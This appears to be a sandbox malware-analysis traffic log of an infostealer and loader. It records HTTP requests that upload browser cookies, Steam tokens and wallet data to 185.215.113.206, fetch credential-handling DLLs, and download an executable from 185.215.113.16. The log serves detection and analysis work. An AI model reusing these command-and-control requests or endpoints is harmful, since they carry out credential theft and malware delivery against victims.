Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFHHost: 185.215.113.206Content-Length: 427Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 2d 2d 0d 0a Data Ascii: ------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------CFCBFBGDBKJKECAAKKFH--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGHCAKKFBGDHJJJKECFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 48 43 41 4b 4b 46 42 47 44 48 4a 4a 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 48 43 41 4b 4b 46 42 47 44 48 4a 4a 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 48 43 41 4b 4b 46 42 47 44 48 4a 4a 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 48 43 41 4b 4b 46 42 47 44 48 4a 4a 4a 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------CBGHCAKKFBGDHJJJKECFContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------CBGHCAKKFBGDHJJJKECFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CBGHCAKKFBGDHJJJKECFContent-Disposition: form-data; name="file"------CBGHCAKKFBGDHJJJKECF--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHDBGDHDAECBGDHJKFIHost: 185.215.113.206Content-Length: 3087Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="file"------AFHDAKJKFCFBGCBGDHCB--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIEBAAFBFBAKFIDBAFHHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIEBAAFBFBAKFIDBAFHHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 42 41 41 46 42 46 42 41 4b 46 49 44 42 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 41 41 46 42 46 42 41 4b 46 49 44 42 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 61 47 6c 7a 64 47 39 79 65 56 78 4e 62 33 70 70 62 47 78 68 49 45 5a 70 63 6d 56 6d 62 33 68 66 64 6a 5a 36 59 32 68 6f 61 48 59 75 5a 47 56 6d 59 58 56 73 64 43 31 79 5a 57 78 6c 59 58 4e 6c 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 41 41 46 42 46 42 41 4b 46 49 44 42 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 61 48 52 30 63 48 4d 36 4c 79 39 7a 64 58 42 77 62 33 4a 30 4c 6d 31 76 65 6d 6c 73 62 47 45 75 62 33 4a 6e 4c 33 42 79 62 32 52 31 59 33 52 7a 4c 32 5a 70 63 6d 56 6d 62 33 67 4b 61 48 52 30 63 48 4d 36 4c 79 39 7a 64 58 42 77 62 33 4a 30 4c 6d 31 76 65 6d 6c 73 62 47 45 75 62 33 4a 6e 4c 32 74 69 4c 32 4e 31 63 33 52 76 62 57 6c 36 5a 53 31 6d 61 58 4a 6c 5a 6d 39 34 4c 57 4e 76 62 6e 52 79 62 32 78 7a 4c 57 4a 31 64 48 52 76 62 6e 4d 74 59 57 35 6b 4c 58 52 76 62 32 78 69 59 58 4a 7a 50 33 56 30 62 56 39 7a 62 33 56 79 59 32 55 39 5a 6d 6c 79 5a 57 5a 76 65 43 31 69 63 6d 39 33 63 32 56 79 4a 6e 56 30 62 56 39 74 5a 57 52 70 64 57 30 39 5a 47 56 6d 59 58 56 73 64 43 31 69 62 32 39 72 62 57 46 79 61 33 4d 6d 64 58 52 74 58 32 4e 68 62 58 42 68 61 57 64 75 50 57 4e 31 63 33 52 76 62 57 6c 36 5a 51 70 6f 64 48 52 77 63 7a 6f 76 4c 33 64 33 64 79 35 74 62 33 70 70 62 47 78 68 4c 6d 39 79 5a 79 39 6a 62 32 35 30 63 6d 6c 69 64 58 52 6c 4c 77 70 6f 64 48 52 77 63 7a 6f 76 4c 33 64 33 64 79 35 74 62 33 70 70 62 47 78 68 4c 6d 39 79 5a 79 39 68 59 6d 39 31 64 43 38 4b 61 48 52 30 63 48 4d 36 4c 79 39 33 64 33 63 75 62 57 39 36 61 57 78 73 59 53 35 76 63 6d 63 76 5a 6d 6c 79 5a 57 5a 76 65 43 38 2f 64 58 52 74 58 32 31 6c 5a 47 6c 31 62 54 31 6d 61 58 4a 6c 5a 6d 39 34 4c 57 52 6c 63 32 74 30 62 33 41 6d 64 58 52 74 58 33 4e 76 64 58 4a 6a 5a 54 31 69 62 32 39 72 62 57 46 79 61 33 4d 74 64 47 39 76 62 47 4a 68 63 69 5a 31 64 47 31 66 59 32 46 74 63 47 46 70 5a 32 34 39 62 6d 56 33 4c 58 56 7a 5a 58 4a 7a 4a 6e 56 30 62 56 39 6a 62 32 35 30 5a 57 35 30 50 53 31 6e 62 47 39 69 59 57 77 4b 61 48 52 30 63 48 4d 36 4c 79 39 33 64 33 63
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIECAAKECFHIECBKJDHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 2d 2d 0d 0a Data Ascii: ------HIIIECAAKECFHIECBKJDContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------HIIIECAAKECFHIECBKJDContent-Disposition: form-data; name="message"wallets------HIIIECAAKECFHIECBKJD--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHIEBKJKFIEBGDGDAAHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 2d 2d 0d 0a Data Ascii: ------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="message"files------KKEHIEBKJKFIEBGDGDAA--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 2d 2d 0d 0a Data Ascii: ------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="file"------BGCAAFHIEBKJKEBFIEHD--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFCGIDAKECGCBGDBAFIHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 61 30 30 31 31 65 62 35 63 62 38 33 39 33 66 34 62 62 33 63 66 36 63 35 35 39 39 31 34 37 31 31 39 38 33 38 36 34 32 36 62 34 39 64 64 37 37 39 65 63 31 30 39 30 66 38 61 38 31 30 63 66 62 37 30 65 36 31 66 61 33 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 2d 2d 0d 0a Data Ascii: ------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="token"ba0011eb5cb8393f4bb3cf6c55991471198386426b49dd779ec1090f8a810cfb70e61fa3------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="message"ybncbhylepme------FBFCGIDAKECGCBGDBAFI--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
